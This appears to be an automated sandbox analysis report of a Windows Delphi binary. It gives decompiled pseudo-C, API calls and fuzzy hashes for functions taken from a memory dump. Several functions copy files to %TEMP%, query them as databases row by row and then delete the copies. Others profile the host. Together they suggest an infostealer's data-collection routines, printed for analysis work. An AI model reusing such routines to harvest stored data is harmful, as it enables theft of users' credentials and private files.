                                                                                                                                                                                              0x00410dbe
                                                                                                                                                                                              0x00410cab
                                                                                                                                                                                              0x00410cad
                                                                                                                                                                                              0x00410cb0
                                                                                                                                                                                              0x00410cb0
                                                                                                                                                                                              0x00410dc5
                                                                                                                                                                                              0x00410dc8
                                                                                                                                                                                              0x00410dcb
                                                                                                                                                                                              0x00410dd8
                                                                                                                                                                                              0x00410de0
                                                                                                                                                                                              0x00410de8
                                                                                                                                                                                              0x00410df0
                                                                                                                                                                                              0x00410dfd
                                                                                                                                                                                              0x00410e05
                                                                                                                                                                                              0x00410e12
                                                                                                                                                                                              0x00410e1f

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00410BFD
                                                                                                                                                                                              • CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00410E58,?,.tmp,?,?,00000000,00410DA0,?,00000000,00410E20,?,00000000), ref: 00410C79
                                                                                                                                                                                              • DeleteFileW.KERNEL32(00000000), ref: 00410DBE
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: File$CopyCountDeleteTick
                                                                                                                                                                                              • String ID: %TEMP%$.tmp
                                                                                                                                                                                              • API String ID: 2381671008-3650661790
                                                                                                                                                                                              • Opcode ID: 4a067d1f8ba6d400319fcf7a723a146227050b837b1c7306f0a806063b549887
                                                                                                                                                                                              • Instruction ID: 978216aeb9802c3a8092c63d781cd7ad87e87d7acf88f4e3b280f19958954086
                                                                                                                                                                                              • Opcode Fuzzy Hash: 4a067d1f8ba6d400319fcf7a723a146227050b837b1c7306f0a806063b549887
                                                                                                                                                                                              • Instruction Fuzzy Hash: 7C710C71A00109AFDB00EBD5DC42ADEBBB9EF48318F50447AF514F7292DA78AE458A58
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 00410900, Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 197fileCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 46%
                                                                                                                                                                                              			E00410900(char __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				WCHAR* _t76;
				intOrPtr* _t91;
				void* _t93;
				intOrPtr* _t95;
				intOrPtr* _t99;
				intOrPtr* _t132;
				void* _t134;
				intOrPtr* _t136;
				void* _t138;
				intOrPtr* _t140;
				intOrPtr* _t146;
				void* _t148;
				void* _t154;
				intOrPtr _t174;
				intOrPtr _t176;
				intOrPtr _t183;
				intOrPtr _t187;
				intOrPtr _t188;
				void* _t189;
				void* _t190;

				_t185 = __esi;
				_t153 = __ebx;
				_t187 = _t188;
				_t154 = 9;
				do {
					_push(0);
					_push(0);
					_t154 = _t154 - 1;
					_t192 = _t154;
				} while (_t154 != 0);
				_push(_t154);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v12 = __edx;
				_v8 = __eax;
				E004040F4( &_v8);
				_push(_t187);
				_push(0x410b63);
				_push( *[fs:eax]);
				 *[fs:eax] = _t188;
				E004034E4( &_v28);
				_push(_t187);
				_push(0x410ae8);
				_push( *[fs:eax]);
				 *[fs:eax] = _t188;
				E00406FDC(GetTickCount(), __ebx,  &_v48, __esi, _t192);
				_push(_v48);
				E00406F1C( &_v52, __ebx, __edi, __esi, _t192);
				_push(_v52);
				_push(L".tmp");
				E00403E1C();
				E0040781C(_v8, _t153,  &_v40, _t192);
				E004062D8(L"%TEMP%",  &_v60, _t192);
				_push(_v60);
				_push(0x410b9c);
				_push(_v32);
				E00403E1C();
				E0040781C(_v56, _t153,  &_v44, _t192);
				_t76 = E00403D3C(_v44);
				CopyFileW(E00403D3C(_v40), _t76, 0xffffffff);
				E0040377C( &_v64, _v44);
				E00404AFC(_v64, _t153, _t154,  &_v36, _t185, _t192);
				E00403D2C( &_v68, _v36);
				if(E004076B0(_v68, _t153, _t154) != 0) {
					_t91 =  *0x41b55c; // 0x41c784
					_t93 =  *((intOrPtr*)( *_t91))(E00403990(_v36),  &_v16);
					_t189 = _t188 + 8;
					__eflags = _t93;
					if(_t93 == 0) {
						E00408120(0x11,  &_v72);
						_t132 =  *0x41b5cc; // 0x41c78c
						_t134 =  *((intOrPtr*)( *_t132))(_v16, E00403990(_v72), 0xffffffff,  &_v20,  &_v24);
						_t190 = _t189 + 0x14;
						__eflags = _t134;
						if(_t134 == 0) {
							while(1) {
								_t136 =  *0x41b600; // 0x41c790
								_t138 =  *((intOrPtr*)( *_t136))(_v20);
								__eflags = _t138 - 0x64;
								if(_t138 != 0x64) {
									goto L9;
								}
								_t140 =  *0x41b588; // 0x41c794
								E004036DC( &_v76,  *((intOrPtr*)( *_t140))(_v20, 0, _v28));
								_t146 =  *0x41b588; // 0x41c794
								_t148 =  *((intOrPtr*)( *_t146))(_v20, 1, 0x410ba8, _v76);
								_t190 = _t190 + 0x10;
								E004036DC( &_v80, _t148);
								_push(_v80);
								_push(E00410BB4);
								E00403850();
							}
						}
					}
					L9:
					_t95 =  *0x41b654; // 0x41c79c
					 *((intOrPtr*)( *_t95))(_v20);
					_t99 =  *0x41b590; // 0x41c788
					 *((intOrPtr*)( *_t99))(_v16);
					_pop(_t174);
					 *[fs:eax] = _t174;
					E00403D2C(_v12, _v28);
					DeleteFileW(E00403D3C(_v44));
				} else {
					_pop(_t183);
					 *[fs:eax] = _t183;
				}
				_pop(_t176);
				 *[fs:eax] = _t176;
				_push(E00410B6A);
				E00403508( &_v80, 3);
				E00403B80( &_v68);
				E004034E4( &_v64);
				E00403B98( &_v60, 6);
				E004034E4( &_v36);
				E00403B80( &_v32);
				E004034E4( &_v28);
				return E00403B80( &_v8);
			}










































                                                                                                                                                                                              0x00410900
                                                                                                                                                                                              0x00410900
                                                                                                                                                                                              0x00410901
                                                                                                                                                                                              0x00410903
                                                                                                                                                                                              0x00410908
                                                                                                                                                                                              0x00410908
                                                                                                                                                                                              0x0041090a
                                                                                                                                                                                              0x0041090c
                                                                                                                                                                                              0x0041090c
                                                                                                                                                                                              0x0041090c
                                                                                                                                                                                              0x0041090f
                                                                                                                                                                                              0x00410910
                                                                                                                                                                                              0x00410911
                                                                                                                                                                                              0x00410912
                                                                                                                                                                                              0x00410913
                                                                                                                                                                                              0x00410916
                                                                                                                                                                                              0x0041091c
                                                                                                                                                                                              0x00410923
                                                                                                                                                                                              0x00410924
                                                                                                                                                                                              0x00410929
                                                                                                                                                                                              0x0041092c
                                                                                                                                                                                              0x00410932
                                                                                                                                                                                              0x00410939
                                                                                                                                                                                              0x0041093a
                                                                                                                                                                                              0x0041093f
                                                                                                                                                                                              0x00410942
                                                                                                                                                                                              0x0041094d
                                                                                                                                                                                              0x00410952
                                                                                                                                                                                              0x00410958
                                                                                                                                                                                              0x0041095d
                                                                                                                                                                                              0x00410960
                                                                                                                                                                                              0x0041096d
                                                                                                                                                                                              0x00410978
                                                                                                                                                                                              0x00410985
                                                                                                                                                                                              0x0041098a
                                                                                                                                                                                              0x0041098d
                                                                                                                                                                                              0x00410992
                                                                                                                                                                                              0x0041099d
                                                                                                                                                                                              0x004109a8
                                                                                                                                                                                              0x004109b2
                                                                                                                                                                                              0x004109c1
                                                                                                                                                                                              0x004109cc
                                                                                                                                                                                              0x004109d7
                                                                                                                                                                                              0x004109e2
                                                                                                                                                                                              0x004109f1
                                                                                                                                                                                              0x00410a0d
                                                                                                                                                                                              0x00410a14
                                                                                                                                                                                              0x00410a16
                                                                                                                                                                                              0x00410a19
                                                                                                                                                                                              0x00410a1b
                                                                                                                                                                                              0x00410a33
                                                                                                                                                                                              0x00410a45
                                                                                                                                                                                              0x00410a4c
                                                                                                                                                                                              0x00410a4e
                                                                                                                                                                                              0x00410a51
                                                                                                                                                                                              0x00410a53
                                                                                                                                                                                              0x00410aaf
                                                                                                                                                                                              0x00410ab3
                                                                                                                                                                                              0x00410aba
                                                                                                                                                                                              0x00410abd
                                                                                                                                                                                              0x00410ac0
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00410a60
                                                                                                                                                                                              0x00410a71
                                                                                                                                                                                              0x00410a84
                                                                                                                                                                                              0x00410a8b
                                                                                                                                                                                              0x00410a8d
                                                                                                                                                                                              0x00410a95
                                                                                                                                                                                              0x00410a9a
                                                                                                                                                                                              0x00410a9d
                                                                                                                                                                                              0x00410aaa
                                                                                                                                                                                              0x00410aaa
                                                                                                                                                                                              0x00410aaf
                                                                                                                                                                                              0x00410a53
                                                                                                                                                                                              0x00410ac2
                                                                                                                                                                                              0x00410ac6
                                                                                                                                                                                              0x00410acd
                                                                                                                                                                                              0x00410ad4
                                                                                                                                                                                              0x00410adb
                                                                                                                                                                                              0x00410ae0
                                                                                                                                                                                              0x00410ae3
                                                                                                                                                                                              0x00410af8
                                                                                                                                                                                              0x00410b06
                                                                                                                                                                                              0x004109f3
                                                                                                                                                                                              0x004109f5
                                                                                                                                                                                              0x004109f8
                                                                                                                                                                                              0x004109f8
                                                                                                                                                                                              0x00410b0d
                                                                                                                                                                                              0x00410b10
                                                                                                                                                                                              0x00410b13
                                                                                                                                                                                              0x00410b20
                                                                                                                                                                                              0x00410b28
                                                                                                                                                                                              0x00410b30
                                                                                                                                                                                              0x00410b3d
                                                                                                                                                                                              0x00410b45
                                                                                                                                                                                              0x00410b4d
                                                                                                                                                                                              0x00410b55
                                                                                                                                                                                              0x00410b62

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00410945
                                                                                                                                                                                              • CopyFileW.KERNEL32(00000000,00000000,000000FF,?,00410B9C,?,.tmp,?,?,00000000,00410AE8,?,00000000,00410B63,?,00000000), ref: 004109C1
                                                                                                                                                                                              • DeleteFileW.KERNEL32(00000000), ref: 00410B06
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: File$CopyCountDeleteTick
                                                                                                                                                                                              • String ID: %TEMP%$.tmp
                                                                                                                                                                                              • API String ID: 2381671008-3650661790
                                                                                                                                                                                              • Opcode ID: b6365babbb2d3b2e1b37703ec200a2ec6b79da26c3864396c2c11ec0f131d7bb
                                                                                                                                                                                              • Instruction ID: 1e08b77d5c93ddd244bb37ca777f3c967e0d5c0e96542229b92685f54af29c93
                                                                                                                                                                                              • Opcode Fuzzy Hash: b6365babbb2d3b2e1b37703ec200a2ec6b79da26c3864396c2c11ec0f131d7bb
                                                                                                                                                                                              • Instruction Fuzzy Hash: DA710B71A04109AFDB00EF95DC41EDEBBB9EF48318F104476F514F72A2DA78AE458B58
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 00402AC4, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 65%
                                                                                                                                                                                              			E00402AC4() {
				void* _v8;
				char _v12;
				int _v16;
				signed short _t12;
				signed short _t14;
				intOrPtr _t27;
				void* _t29;
				void* _t31;
				intOrPtr _t32;

				_t29 = _t31;
				_t32 = _t31 + 0xfffffff4;
				_v12 =  *0x41b018 & 0x0000ffff;
				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
					_t12 =  *0x41b018; // 0x1332
					_t14 = _t12 & 0x0000ffc0 | _v12 & 0x0000003f;
					 *0x41b018 = _t14;
					return _t14;
				} else {
					_push(_t29);
					_push(E00402B35);
					_push( *[fs:eax]);
					 *[fs:eax] = _t32;
					_v16 = 4;
					RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
					_pop(_t27);
					 *[fs:eax] = _t27;
					_push(0x402b3c);
					return RegCloseKey(_v8);
				}
			}












                                                                                                                                                                                              0x00402ac5
                                                                                                                                                                                              0x00402ac7
                                                                                                                                                                                              0x00402ad1
                                                                                                                                                                                              0x00402aed
                                                                                                                                                                                              0x00402b3c
                                                                                                                                                                                              0x00402b4e
                                                                                                                                                                                              0x00402b51
                                                                                                                                                                                              0x00402b5a
                                                                                                                                                                                              0x00402aef
                                                                                                                                                                                              0x00402af1
                                                                                                                                                                                              0x00402af2
                                                                                                                                                                                              0x00402af7
                                                                                                                                                                                              0x00402afa
                                                                                                                                                                                              0x00402afd
                                                                                                                                                                                              0x00402b19
                                                                                                                                                                                              0x00402b20
                                                                                                                                                                                              0x00402b23
                                                                                                                                                                                              0x00402b26
                                                                                                                                                                                              0x00402b34
                                                                                                                                                                                              0x00402b34

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402AE6
                                                                                                                                                                                              • RegQueryValueExA.ADVAPI32(?,FPUMaskValue,00000000,00000000,?,00000004,00000000,00402B35,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402B19
                                                                                                                                                                                              • RegCloseKey.ADVAPI32(?,00402B3C,00000000,?,00000004,00000000,00402B35,?,80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402B2F
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CloseOpenQueryValue
                                                                                                                                                                                              • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                                                                                                                              • API String ID: 3677997916-4173385793
                                                                                                                                                                                              • Opcode ID: c24f3397a1a0978606a1aef1272915d0389f866a146333db21e610f4ec5f9f7b
                                                                                                                                                                                              • Instruction ID: 9172d05214030136d6eeabac91fa7c92d03713ed8c8260d1a9efe939ba63eb8f
                                                                                                                                                                                              • Opcode Fuzzy Hash: c24f3397a1a0978606a1aef1272915d0389f866a146333db21e610f4ec5f9f7b
                                                                                                                                                                                              • Instruction Fuzzy Hash: 04019275500308B9DB21AF908D46FAA7BB8D708700F600076BA04F66D0E7B8AA10979C
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 00416584, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 46libraryloaderCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 66%
                                                                                                                                                                                              			E00416584(void* __eax, void* __ebx, void* __esi, void* __eflags) {
				intOrPtr _v56;
				intOrPtr _v60;
				char _v68;
				char _v72;
				_Unknown_base(*)()* _t13;
				intOrPtr _t36;
				void* _t38;
				void* _t39;
				void* _t41;
				void* _t43;

				_t43 = __eflags;
				_v72 = 0;
				_t38 = __eax;
				 *[fs:eax] = _t41 + 0xffffffbc;
				_t13 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GlobalMemoryStatusEx");
				E004028E0( &_v68, 0x40);
				_v68 = 0x40;
				 *_t13( &_v68,  *[fs:eax], 0x41660e, _t41, __esi, __ebx, _t39);
				E00406FDC(E00404570(_v60, _v56, 0x100000, 0), _t13,  &_v72, _t38, _t43);
				E0040377C(_t38, _v72);
				_pop(_t36);
				 *[fs:eax] = _t36;
				_push(E00416615);
				return E00403B80( &_v72);
			}













                                                                                                                                                                                              0x00416584
                                                                                                                                                                                              0x0041658e
                                                                                                                                                                                              0x00416591
                                                                                                                                                                                              0x0041659e
                                                                                                                                                                                              0x004165b1
                                                                                                                                                                                              0x004165c2
                                                                                                                                                                                              0x004165c7
                                                                                                                                                                                              0x004165d2
                                                                                                                                                                                              0x004165e9
                                                                                                                                                                                              0x004165f3
                                                                                                                                                                                              0x004165fa
                                                                                                                                                                                              0x004165fd
                                                                                                                                                                                              0x00416600
                                                                                                                                                                                              0x0041660d

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,GlobalMemoryStatusEx,00000000,0041660E,?,0041B0FC,?), ref: 004165AB
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004165B1
                                                                                                                                                                                                • Part of subcall function 00403B80: SysFreeString.OLEAUT32(00000000), ref: 00403B8E
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressFreeLibraryLoadProcString
                                                                                                                                                                                              • String ID: @$GlobalMemoryStatusEx$kernel32.dll
                                                                                                                                                                                              • API String ID: 923276998-3878206809
                                                                                                                                                                                              • Opcode ID: 85db832d693e486d1a61cee5b690b9a662077cbaa7453f9a7cd2e2dd296e1093
                                                                                                                                                                                              • Instruction ID: ae4c68d41a3a4174a937c26ab83d8f0c6d254553f6270358502c1b43c0ddce29
                                                                                                                                                                                              • Opcode Fuzzy Hash: 85db832d693e486d1a61cee5b690b9a662077cbaa7453f9a7cd2e2dd296e1093
                                                                                                                                                                                              • Instruction Fuzzy Hash: A3018871A002086BD711EBA5DC42E8EB7BDEB88744F61413AF504B32D1E77CAD01855C
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 00406654, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 32libraryloaderCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 33%
                                                                                                                                                                                              			E00406654(void* __ecx) {
				signed char _t3;
				signed char _t7;
				intOrPtr* _t8;
				signed char* _t11;

				_t8 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "IsWow64Process");
				_t3 = 0;
				 *_t11 = 0;
				if(_t8 != 0) {
					_push(_t11);
					_push(GetCurrentProcess());
					if( *_t8() == 0 ||  *_t11 == 0) {
						_t7 = 0;
					} else {
						_t7 = 1;
					}
					_t3 =  ~_t7;
					asm("sbb eax, eax");
					 *_t11 = _t3;
				}
				asm("sbb eax, eax");
				return _t3 + 1;
			}







                                                                                                                                                                                              0x0040666b
                                                                                                                                                                                              0x0040666d
                                                                                                                                                                                              0x0040666f
                                                                                                                                                                                              0x00406674
                                                                                                                                                                                              0x00406676
                                                                                                                                                                                              0x0040667c
                                                                                                                                                                                              0x00406681
                                                                                                                                                                                              0x00406689
                                                                                                                                                                                              0x0040668d
                                                                                                                                                                                              0x0040668d
                                                                                                                                                                                              0x0040668d
                                                                                                                                                                                              0x0040668f
                                                                                                                                                                                              0x00406691
                                                                                                                                                                                              0x00406693
                                                                                                                                                                                              0x00406693
                                                                                                                                                                                              0x0040669a
                                                                                                                                                                                              0x0040669f

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll,IsWow64Process,?,?,004066D4,?,00417330,00000000,004175F4,?,Windows : ,?,,?,EXE_PATH : ,?), ref: 00406660
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00406666
                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(?,00000000,kernel32.dll,IsWow64Process,?,?,004066D4,?,00417330,00000000,004175F4,?,Windows : ,?,,?), ref: 00406677
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressCurrentHandleModuleProcProcess
                                                                                                                                                                                              • String ID: IsWow64Process$kernel32.dll
                                                                                                                                                                                              • API String ID: 4190356694-3024904723
                                                                                                                                                                                              • Opcode ID: bb90ac27b46476fccc6d3856fb06f30bc2750b404d13dc0022771fe07b4660df
                                                                                                                                                                                              • Instruction ID: ba80d2391f81007aa42feea1da534082dc1adbf3711fe3d895332dec38dcedd5
                                                                                                                                                                                              • Opcode Fuzzy Hash: bb90ac27b46476fccc6d3856fb06f30bc2750b404d13dc0022771fe07b4660df
                                                                                                                                                                                              • Instruction Fuzzy Hash: B0E06DB12143019EEB007EB58881A3B21C89B44305F130E3EA496F21C1E97EC8A0866D
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 00410E58, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 120fileCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 47%
                                                                                                                                                                                              			E00410E58(signed int __eax, void* __ebx, intOrPtr* __ecx, intOrPtr __edx, void* __edi, void* __esi) {
				signed int _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				intOrPtr _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				intOrPtr _v117;
				signed int _t70;
				signed int _t71;
				WCHAR* _t91;
				intOrPtr* _t106;
				intOrPtr _t108;
				intOrPtr* _t110;
				intOrPtr* _t114;
				intOrPtr* _t151;
				intOrPtr _t153;
				intOrPtr* _t155;
				void* _t157;
				intOrPtr* _t159;
				intOrPtr* _t163;
				void* _t165;
				intOrPtr* _t170;
				intOrPtr* _t176;
				intOrPtr* _t182;
				void* _t184;
				intOrPtr* _t188;
				void* _t192;
				intOrPtr _t213;
				intOrPtr _t215;
				void* _t221;
				intOrPtr _t227;
				intOrPtr _t231;
				intOrPtr _t232;
				void* _t233;
				void* _t234;

				_t229 = __esi;
				_t190 = __ebx;
				_pop(_t232);
				 *__eax =  *__eax + __eax;
				 *((intOrPtr*)(__edx)) =  *((intOrPtr*)(__edx)) + __eax;
				 *__eax =  *__eax + __eax;
				 *__ecx =  *__ecx + __ecx;
				 *__eax =  *__eax | __eax;
				 *__eax =  *__eax + __eax;
				_t70 = __eax;
				 *_t70 =  *_t70 + _t70;
				_t71 = _t70 | 0x00000a00;
				 *_t71 =  *_t71 + _t71;
				_v117 = _v117 + __edx;
				_t231 = _t232;
				_t192 = 0xb;
				do {
					_push(0);
					_push(0);
					_t192 = _t192 - 1;
					_t242 = _t192;
				} while (_t192 != 0);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v12 = __edx;
				_v8 = _t71;
				E004040F4( &_v8);
				_push(_t231);
				_push(0x411163);
				_push( *[fs:eax]);
				 *[fs:eax] = _t232;
				E00403B80( &_v28);
				_push(_t231);
				_push(0x4110ce);
				_push( *[fs:eax]);
				 *[fs:eax] = _t232;
				E00406FDC(GetTickCount(), __ebx,  &_v52, __esi, _t242);
				_push(_v52);
				E00406F1C( &_v56, __ebx, __edi, __esi, _t242);
				_push(_v56);
				_push(L".tmp");
				E00403E1C();
				E0040781C(_v8, _t190,  &_v40, _t242);
				E004062D8(L"%TEMP%",  &_v64, _t242);
				_push(_v64);
				_push(0x41119c);
				_push(_v32);
				E00403E1C();
				E0040781C(_v60, _t190,  &_v44, _t242);
				_t91 = E00403D3C(_v44);
				CopyFileW(E00403D3C(_v40), _t91, 0xffffffff);
				E0040377C( &_v68, _v44);
				E00404AFC(_v68, _t190, _t192,  &_v36, _t229, _t242);
				E00403D2C( &_v72, _v36);
				if(E004076B0(_v72, _t190, _t192) != 0) {
					_t106 =  *0x41b55c; // 0x41c784
					_t108 =  *((intOrPtr*)( *_t106))(E00403990(_v36),  &_v16);
					_t233 = _t232 + 8;
					__eflags = _t108;
					if(_t108 == 0) {
						E00408120(0x66,  &_v76);
						_t151 =  *0x41b5cc; // 0x41c78c
						_t153 =  *((intOrPtr*)( *_t151))(_v16, E00403990(_v76), 0xffffffff,  &_v20,  &_v24);
						_t234 = _t233 + 0x14;
						__eflags = _t153;
						if(_t153 == 0) {
							while(1) {
								_t155 =  *0x41b600; // 0x41c790
								_t157 =  *((intOrPtr*)( *_t155))(_v20);
								__eflags = _t157 - 0x64;
								if(_t157 != 0x64) {
									goto L12;
								}
								_t159 =  *0x41b644; // 0x41c798
								_t163 =  *0x41b588; // 0x41c794
								_t165 =  *((intOrPtr*)( *_t163))(_v20, 3,  *((intOrPtr*)( *_t159))(_v20, 3));
								_pop(_t221);
								E004094C4(_t165,  &_v48, _t221);
								E00403D2C( &_v80, _v48);
								_t170 =  *0x41b588; // 0x41c794
								E00403C98( &_v84,  *((intOrPtr*)( *_t170))(_v20, 0, 0x4111a4, _v80, _v28));
								_t176 =  *0x41b588; // 0x41c794
								E00403C98( &_v88,  *((intOrPtr*)( *_t176))(_v20, 1, 0x4111a4, _v84));
								_t182 =  *0x41b588; // 0x41c794
								_t184 =  *((intOrPtr*)( *_t182))(_v20, 2, 0x4111b0, _v88);
								_t234 = _t234 + 0x28;
								E00403C98( &_v92, _t184);
								_push(_v92);
								_push(L"\r\n\r\n");
								E00403E1C();
								_t188 =  *0x41b584; // 0x41b0b4
								 *_t188 =  *_t188 + 1;
								__eflags =  *_t188;
							}
						}
					}
					L12:
					_t110 =  *0x41b654; // 0x41c79c
					 *((intOrPtr*)( *_t110))(_v20);
					_t114 =  *0x41b590; // 0x41c788
					 *((intOrPtr*)( *_t114))(_v16);
					_pop(_t213);
					 *[fs:eax] = _t213;
					E00403BBC(_v12, _v28);
					DeleteFileW(E00403D3C(_v44));
				} else {
					_pop(_t227);
					 *[fs:eax] = _t227;
				}
				_pop(_t215);
				 *[fs:eax] = _t215;
				_push(E0041116A);
				E00403B98( &_v92, 4);
				E004034E4( &_v76);
				E00403B80( &_v72);
				E004034E4( &_v68);
				E00403B98( &_v64, 4);
				E004034E4( &_v48);
				E00403B98( &_v44, 2);
				E004034E4( &_v36);
				E00403B98( &_v32, 2);
				return E00403B80( &_v8);
			}






















































                                                                                                                                                                                              0x00410e58
                                                                                                                                                                                              0x00410e58
                                                                                                                                                                                              0x00410e58
                                                                                                                                                                                              0x00410e59
                                                                                                                                                                                              0x00410e5b
                                                                                                                                                                                              0x00410e5d
                                                                                                                                                                                              0x00410e5f
                                                                                                                                                                                              0x00410e60
                                                                                                                                                                                              0x00410e62
                                                                                                                                                                                              0x00410e64
                                                                                                                                                                                              0x00410e66
                                                                                                                                                                                              0x00410e68
                                                                                                                                                                                              0x00410e6d
                                                                                                                                                                                              0x00410e6f
                                                                                                                                                                                              0x00410e71
                                                                                                                                                                                              0x00410e73
                                                                                                                                                                                              0x00410e78
                                                                                                                                                                                              0x00410e78
                                                                                                                                                                                              0x00410e7a
                                                                                                                                                                                              0x00410e7c
                                                                                                                                                                                              0x00410e7c
                                                                                                                                                                                              0x00410e7c
                                                                                                                                                                                              0x00410e7f
                                                                                                                                                                                              0x00410e80
                                                                                                                                                                                              0x00410e81
                                                                                                                                                                                              0x00410e82
                                                                                                                                                                                              0x00410e85
                                                                                                                                                                                              0x00410e8b
                                                                                                                                                                                              0x00410e92
                                                                                                                                                                                              0x00410e93
                                                                                                                                                                                              0x00410e98
                                                                                                                                                                                              0x00410e9b
                                                                                                                                                                                              0x00410ea1
                                                                                                                                                                                              0x00410ea8
                                                                                                                                                                                              0x00410ea9
                                                                                                                                                                                              0x00410eae
                                                                                                                                                                                              0x00410eb1
                                                                                                                                                                                              0x00410ebc
                                                                                                                                                                                              0x00410ec1
                                                                                                                                                                                              0x00410ec7
                                                                                                                                                                                              0x00410ecc
                                                                                                                                                                                              0x00410ecf
                                                                                                                                                                                              0x00410edc
                                                                                                                                                                                              0x00410ee7
                                                                                                                                                                                              0x00410ef4
                                                                                                                                                                                              0x00410ef9
                                                                                                                                                                                              0x00410efc
                                                                                                                                                                                              0x00410f01
                                                                                                                                                                                              0x00410f0c
                                                                                                                                                                                              0x00410f17
                                                                                                                                                                                              0x00410f21
                                                                                                                                                                                              0x00410f30
                                                                                                                                                                                              0x00410f3b
                                                                                                                                                                                              0x00410f46
                                                                                                                                                                                              0x00410f51
                                                                                                                                                                                              0x00410f60
                                                                                                                                                                                              0x00410f7c
                                                                                                                                                                                              0x00410f83
                                                                                                                                                                                              0x00410f85
                                                                                                                                                                                              0x00410f88
                                                                                                                                                                                              0x00410f8a
                                                                                                                                                                                              0x00410fa2
                                                                                                                                                                                              0x00410fb4
                                                                                                                                                                                              0x00410fbb
                                                                                                                                                                                              0x00410fbd
                                                                                                                                                                                              0x00410fc0
                                                                                                                                                                                              0x00410fc2
                                                                                                                                                                                              0x00411091
                                                                                                                                                                                              0x00411095
                                                                                                                                                                                              0x0041109c
                                                                                                                                                                                              0x0041109f
                                                                                                                                                                                              0x004110a2
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00000000
                                                                                                                                                                                              0x00410fd3
                                                                                                                                                                                              0x00410fe6
                                                                                                                                                                                              0x00410fed
                                                                                                                                                                                              0x00410ff5
                                                                                                                                                                                              0x00410ff6
                                                                                                                                                                                              0x00411004
                                                                                                                                                                                              0x00411017
